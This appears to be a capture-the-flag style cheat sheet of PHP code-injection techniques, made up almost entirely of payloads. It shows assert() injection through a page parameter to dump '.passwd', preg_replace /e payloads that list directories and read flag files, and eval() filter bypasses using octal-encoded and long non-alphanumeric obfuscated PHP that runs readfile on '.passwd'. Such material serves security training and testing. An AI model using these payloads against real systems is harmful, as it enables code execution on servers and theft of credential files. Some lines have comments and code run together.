# The assert() function will execute code in params# Example using challenge
?page=..
Warning : assert() : Assertion "strpos(’includes/...php’, ’..’) === false" failed in path/index.php on line 8# The request looks like this
assert("strpos('includes/' . $_GET['page'] . '.php', '..') === false")# If we inject this
?page=salade.php','..') || print('tomate') || strpos('oignons
# The request will look like
assert("strpos('/includes/salade.php','..') || print('tomate') || strpos('oignons.php','..') ===false")# Then, to exploit
?page=salade.php','..') || show_source('.passwd') || strpos('oignons
PHP preg_replace()
# In PHP, regular expressions need delimiter
preg_match("recherche","contenu");# wrong
preg_match("/recherche/","contenu");# OK# preg_replace offers an option to execute code
preg_replace("input1search","input2replace","input3content");
preg_replace("/a/e","print(123)","abcd");
preg_replace("/a/e","print_r(scandir('.'))","abcd");
preg_replace("/a/e","file_get_contents('flag.php')","abcd");
PHP preg_match()
# It is possible to bypass some functions like preg_match by injecting non-alphanumeric char
# If the application uses eval() on the user input, the payload will still be executed
# Application code
if(!preg_match('/[a-zA-Z`]/',$_POST['input'])){print'<fieldset><legend>Result</legend>';eval('print '.$_POST['input'].";");print'</fieldset>';}# Exploitation and Bypass
# You can encode the payload in octal
→file_get_contents(".passwd")→"\146\151\154\145\137\147\145\164\137\143\157\156\164\145\156\164\163"("\056\160\141\163\163\167\144")# You can also use non alphanumeric char (https://github.com/v1ll41n/Und3rCov3r)
echo-n“phpinfo();”>tmp.phpphpUnd3rCov3r.ph1tmp.php# If will create an alphax.php file containing the encoded payload
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$__('$_="'.$___.$______.$___________.$______________.$___.$______.$__________.$______________.$___.$______.$___________.$______________.$___.$______.$__________.$______.$___.$______.$__________.$___________.$___.$______.$_________.$___________.$___.$______.$__________.$____________.$___.$__________.$______________.$___.$__________.$______.$___.$____________.$________.'"');$__($_);# You can then for example read file
→readfile(".passwd");$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$__('$_="'.$___.$______.$___________.$_______.$___.$______.$_________.$__________.$___.$______.$_________.$______.$___.$______.$_________.$_________.$___.$______.$_________.$___________.$___.$______.$__________.$______.$___.$______.$__________.$_________.$___.$______.$_________.$__________.$___.$__________.$______________.$___.$_________.$_______.$___.$__________.$___________.$___.$______.$___________.$______________.$___.$______.$_________.$______.$___.$______.$___________.$________.$___.$______.$___________.$________.$___.$______.$___________.$____________.$___.$______.$_________.$_________.$___.$_________.$_______.$___.$__________.$______.$___.$____________.$________.'"');$__($_);